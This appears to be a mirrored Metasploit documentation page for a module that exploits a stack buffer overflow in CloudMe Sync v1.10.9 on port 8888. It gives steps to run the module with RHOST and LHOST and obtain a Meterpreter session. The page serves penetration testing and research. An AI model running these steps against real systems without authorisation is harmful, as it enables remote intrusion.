Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/misc/cloudme_sync.md
Views: 11789
Description
This module exploits a buffer overflow vulnerability found in CloudMe Sync v1.10.9.
Vulnerable Application
CloudMe.00564B00
sets up a buffer that is intended to take up 1048 bytes on the stack to read in data from port 8888. The CloudMe function then passes a pointer to the stack buffer and a max size to Qt5Core._ZN9QIODevice4readEPcx
.
The call to Qt5Core._ZN9QIODevice4readEPcx
shows the pointer and the max size arguments passed in by CloudMe.00564B00
.
Because neither functions check the max size against the actual amount of space allocated on the stack, the program writes past the buffer's allocated space and allows for arbitrary code execution.
Verification Steps
Install CloudMe for Desktop version
v1.10.9
Start the application (you don't need to create an account)
Start
msfconsole
Do
use exploit/windows/misc/cloudme_sync
Do
set RHOST ip
Do
set LHOST ip
Do
exploit
Verify the Meterpreter session is opened